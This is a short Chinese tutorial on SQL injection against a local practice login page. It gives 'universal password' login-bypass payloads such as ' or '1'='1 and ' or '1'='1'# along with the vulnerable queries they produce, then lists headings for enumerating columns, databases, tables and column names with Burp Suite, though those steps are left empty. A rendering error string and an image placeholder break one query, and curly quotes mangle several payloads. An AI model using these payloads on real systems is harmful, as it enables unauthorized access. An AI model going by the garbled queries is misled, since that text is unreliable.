万能密码:
实践靶场:http://127.0.0.1/grade/login.html
等号的优先级大于and,and大于or
万能密码: ‘or’1’='1
select * from " .KaTeX parse error: Double superscript at position 45: … and pass=' '̲or'1'='1 ' …t_name.’’;
万能账号: ‘or’1’=‘1’#
select * from " .$t_name." where id = ’ ‘or’1’=‘1# ’ and pass=’ ’ ;
爆字段数:
爆输出位置:(爆字段位置)
爆数据库名:
在这里插入图片描述
由于限制的输入的长度 我们接下来使用burpsuite进行拦截:
爆表名:
爆列名: